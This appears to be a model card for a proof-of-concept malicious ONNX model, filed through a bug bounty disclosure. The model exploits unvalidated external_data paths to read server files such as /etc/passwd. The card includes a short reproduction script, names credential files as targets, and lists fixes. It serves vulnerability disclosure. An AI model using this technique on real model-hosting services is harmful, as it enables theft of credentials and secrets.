---
tags:
- security
- vulnerability
- poc
license: mit
---

# ONNX Arbitrary File Read PoC

**⚠️ WARNING: Malicious Model - For Security Research Only**

This model demonstrates a critical vulnerability: **Arbitrary File Read via External Data Path Traversal**.

## Vulnerability Description

The ONNX runtime does not validate the `location` field in `TensorProto.external_data`, allowing malicious models to read arbitrary files from the server's filesystem.

## How It Works

1. The model's tensor has `external_data.location` set to `/etc/passwd` (absolute path)
2. When loaded via `onnxruntime.InferenceSession()`, the runtime reads this file
3. File content is loaded into the tensor data
4. Inference output contains the sensitive file content

## Reproduction

```python
import onnxruntime as ort
import numpy as np

# Load malicious model
sess = ort.InferenceSession("file_read_poc.onnx")

# Run inference (no input needed)
outputs = sess.run(None, {})

# Decode file content
file_data = bytes(outputs[0].tolist())
print(file_data.decode('utf-8', errors='ignore'))
# Output: root:x:0:0:root:/root:/bin/bash...
```

## Impact

- **Severity**: Critical
- **Attack Vector**: Model-as-a-Service (MaaS) platforms
- **Affected**: Any system running user-uploaded ONNX models
- **Consequences**: 
  - Credential theft (`~/.aws/credentials`, SSH keys)
  - Source code leakage
  - Configuration file exposure
  - System information disclosure

## Remediation

1. Validate `external_data.location` to ensure it's relative and within model directory
2. Reject absolute paths
3. Implement path sandboxing
4. Add `--allow-external-data` flag (disabled by default)

## Responsible Disclosure

This PoC is submitted through Huntr's responsible disclosure program.

**Category**: MFV (Model File Vulnerability)  
**Status**: Under Review  
**Reporter**: Security Researcher